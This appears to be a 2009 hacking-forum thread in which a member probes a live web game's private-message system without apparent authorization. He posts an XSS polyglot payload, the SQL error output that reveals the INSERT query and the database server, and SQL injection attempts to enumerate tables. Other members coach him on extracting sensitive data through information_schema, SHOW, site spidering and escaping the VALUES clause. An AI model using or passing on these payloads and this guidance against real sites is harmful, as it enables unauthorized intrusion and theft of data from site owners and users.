Follow us on Twitter!
Few are those who can see with their own eyes and hear with their own hearts. - Albert Einstein
Friday, April 18, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 26
Guests Online: 25
Members Online: 1

Registered Members: 82828
Newest Member: uberscon
Latest Articles
View Thread

HellBound Hackers | Computer General | Web hacking

Author

XSS Help.


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-01-09 00:31
Ok, so ive found a hole in a web page that doesnt need detailing. I used this code:
Code
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>



and the appropriate box shows up saying 'XSS' , telling me the page is vuln to XSS. But, i also got an OLE DB error, giving me a DB footprint on the page. I know i can execute JS commands with XSS, but my question is, can i execute SQL commands with XSS?
Author

RE: XSS Help.


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-01-09 00:41
Yeah you can, its called SQL Injection.
Author

RE: XSS Help.


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-01-09 02:00
Well, it depends on the error...


Author

RE: XSS Help.

spyware
Member



Posts: 4192
Location: The Netherlands
Joined: 14.04.07
Rank:
God
Warn Level: 90
Posted on 04-01-09 02:10
Obviously the input passes through a database. The XSS you're getting is just icing. I'd focus on injecting SQL commands, it might be a possibility (depending NOT on the error message but rather the way the input is used).



img507.imageshack.us/img507/3580/spynewsig3il1.png
"The chowner of property." - Zeph
[small]
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.
- Carl Sagan
“Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?” - Ebert
[/s
http://bitsofspy.net
Author

RE: XSS Help.


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-01-09 02:14
Of course, the error message depends on the input! lol


Author

RE: XSS Help.

spyware
Member



Posts: 4192
Location: The Netherlands
Joined: 14.04.07
Rank:
God
Warn Level: 90
Posted on 04-01-09 02:34
454447415244 wrote:
Of course, the error message depends on the input! lol


Could be the case, yeah. What also could be the case is that the script outputs random (fake) errors to confuse hackers.



img507.imageshack.us/img507/3580/spynewsig3il1.png
"The chowner of property." - Zeph
[small]
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.
- Carl Sagan
“Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?” - Ebert
[/s
http://bitsofspy.net
Author

RE: XSS Help.


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-01-09 02:45
This is the error i get when i input the XSS (after the JS box saying 'XSS' pops up)
Code
INSERT INTO W1.messages (GameID, FromA, FromWorld, ToA, ToWorld, Message, SentTime, Title ) VALUES (1, 8157, 'W1', 7030, 'W1', ''';alert(String.fromCharCode(88,83,83))//\'';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))', NOW(), 'sd')

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 5.1 Driver][mysqld-5.0.67-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\' at line 1

/W1/Pidgeon.asp, line 74





This is being injected into a sort of PM system for the web app. It seems as if this is directly affecting the GET, and INSERT functions. What i really want to know though, Is there anyway to get sensitive info from this?
Author

RE: XSS Help.


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-01-09 02:58
Narc0tiX wrote:
This is the error i get when i input the XSS (after the JS box saying 'XSS' pops up)
Code
INSERT INTO W1.messages (GameID, FromA, FromWorld, ToA, ToWorld, Message, SentTime, Title ) VALUES (1, 8157, 'W1', 7030, 'W1', ''';alert(String.fromCharCode(88,83,83))//\'';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))', NOW(), 'sd')

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 5.1 Driver][mysqld-5.0.67-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\' at line 1

/W1/Pidgeon.asp, line 74





This is being injected into a sort of PM system for the web app. It seems as if this is directly affecting the GET, and INSERT functions. What i really want to know though, Is there anyway to get sensitive info from this?


l0l, it is vulnerable to SQL Injection! :happy:

@spyware
yeah, but what an ideal system is this! lol
It might be the case, but usually vulnerabilities are found in places where the webmaster wasn't aware of! ;) unless he's a dumb ass web develpper! :p


Author

RE: XSS Help.


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-01-09 04:36
Well, hes a one man army. Im pretty sure hes the only developer. He had staff before, but they all resigned.

Are you sure its vuln to SQL pwn? 'Cuz i injected XSS with JS not SQL...
Author

RE: XSS Help.


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-01-09 05:42
Ok, so its VERY vuln to SQL injection. But i have another question: whats the best way to find table names? I tried:
Code
\' 1' AND 1=(SELECT COUNT(*) FROM tablenames); --



but i get
Code
INSERT INTO W1.messages (GameID, FromA, FromWorld, ToA, ToWorld, Message, SentTime, Title ) VALUES (1, 8157, 'W1', 7030, 'W1', 'lolololol', NOW(), '\'' 1'' AND 1=(SELECT COUNT(*) FROM tablenames); --')

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 5.1 Driver][mysqld-5.0.67-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' AND 1=(SELECT COUNT(*) FROM tablenames); --')' at line 1

/W1/Pidgeon.asp, line 74




Which really isnt any info that is useful or relevant to the command...
Author

RE: XSS Help.


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-01-09 05:48
You could try information_schema.tables or DESCRIBE. Use Intellitamper to find out everything you can about the site. For instance, I was just looking through some files on this one site and found a bunch of table names and descriptions. You never know what you might find. Wink


Author

RE: XSS Help.


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-01-09 06:47
Yeah, i just used Intellitamper. I found the script that assigns the cookies values, but thats about it. The dev mustve hidden the rest.
Author

RE: XSS Help.


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-01-09 07:09
then try information_schema.tables or try to guess it


Author

RE: XSS Help.


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-01-09 13:49
Skunkfoot wrote:
You could try information_schema.tables or DESCRIBE.

Not DESCRIBE... that's for when you know the table name and want to know the table fields, types, etc. The other way to discover table names (other than information_schema.tables) would be SHOW. Love that command.


Author

RE: XSS Help.


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-01-09 17:39
Ok so i inject SQL that contains a \ (backslash) and a ' (single quote) to escape filters. But everytime, i get an error bitching about the syntax associated with the backslash and single quote. But, when i dont include either one of the two, its sends the PM and the page loads normally. Any idea on how to mark up my commands in order to get what i desire?
Author

RE: XSS Help.


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-01-09 18:08
@Zephyr: Now that I think about it, that makes a lot more sense. >.<

@Other Guy: Post the error? Often times the error message contains useful information.


Author

RE: XSS Help.


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-01-09 18:25
I get this:
Code
INSERT INTO W1.messages (GameID, FromA, FromWorld, ToA, ToWorld, Message, SentTime, Title ) VALUES (1, 8157, 'W1', 7030, 'W1', '.', NOW(), '\''SHOW table_name FROM information_schema.tables''')

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 5.1 Driver][mysqld-5.0.67-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SHOW table_name FROM information_schema.tables''')' at line 1

/W1/Pidgeon.asp, line 74




After inputing this
Code
\'SHOW table_name FROM information_schema.tables'


Author

RE: XSS Help.


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-01-09 19:53
Looks like you'd need to escape from the VALUES block before you could attempt your injection; otherwise, your query will cause an error because it's still part of the INSERT. Also, from the error message you're getting, you can see how your apostrophe is being "escaped"... so, it looks like you're doing that right.